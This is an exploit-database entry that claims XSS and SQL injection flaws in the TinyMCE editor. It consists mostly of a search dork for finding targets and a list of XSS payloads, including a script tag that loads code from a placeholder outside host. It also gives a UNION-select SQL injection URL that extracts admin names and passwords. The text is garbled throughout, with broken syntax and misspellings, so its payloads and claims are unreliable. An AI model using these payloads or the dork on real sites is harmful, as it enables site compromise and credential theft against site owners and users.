TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility - WLB

Text :

===================================================================
TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility
===================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit
0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

[+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility
xss-->popup
*& SQl implemented
[+] Language : Java--,Xml
[+] lisences : LGPL
[+] Vendor : Moxiecode Systems AB
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] vendor : http://tinymce.moxiecode.com/
[+] implemented : joomla componen,drupal..
[+] dork : powered:powered by CMS
: inurl"file_manager.php?type=img"
---------------------------------------------------------------------------
---------
--[Vulnerability sampling]--
---------------------------------------------------------------------------
----------------------------------------------

---------------------------------------------------------------------------
----------------------------------------------
# alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode
(X1,X2,X3,x4))//\";
alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'&
gt;<SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#
---------------------------------------------------------------------------
----------------------------------------------
# '';!--"<XSS>=&{()}'
---------------------------------------------------------------------------
---------
<script SRC=http//:server.com/xss.js></put_SCRIPT>
<a
hreef="http://www.server://www.server.com/server.com/">put_cod
e</a>
<a href="http://www.server.com./">put_code</a>
<marquee>http://server.net">put_code</marquee>
<a href="//srver.net">put_code</A>
<a href="http://0x1x.01x0061.0x6/">put_code</a>
---------------------------------------------------------------------------
---------
[Thread img src]

"<img src=javascript:alert("XSS")>"
"<img src="javascript:alert('Put_script');"> [or]
<IMG SRC=javascript:alert('put_Script')>"
"<IMG
SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
"<img src=`javascript:alert("put_xss")`>"
"<IMG SRC="jav ascript:alert('XSS');">"

<IMG
SRC
=
"
write javascript vertikal position exmpl:
j
s
:
a
l
e
r
t
(
'
put code vertical position
'
)
)
;
>

"<IMG
SRC=>"

try conversion---->use RainbowText from <IMG
SRC=&#3>
make compilign:
<IMG SRC=&#1;&#2;&#3;&#3>
---------------------------------------------------------------------------
---------------------------------------------------------------------------
-------

SQL implemented:Injection vulnerability---->installed on
c-panel(joomla---sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union
select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CH
AR(3,4,5),wachtwoord),2,3 from admin--

# ~ - [ [ : Inj3ct0r : ] ]

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility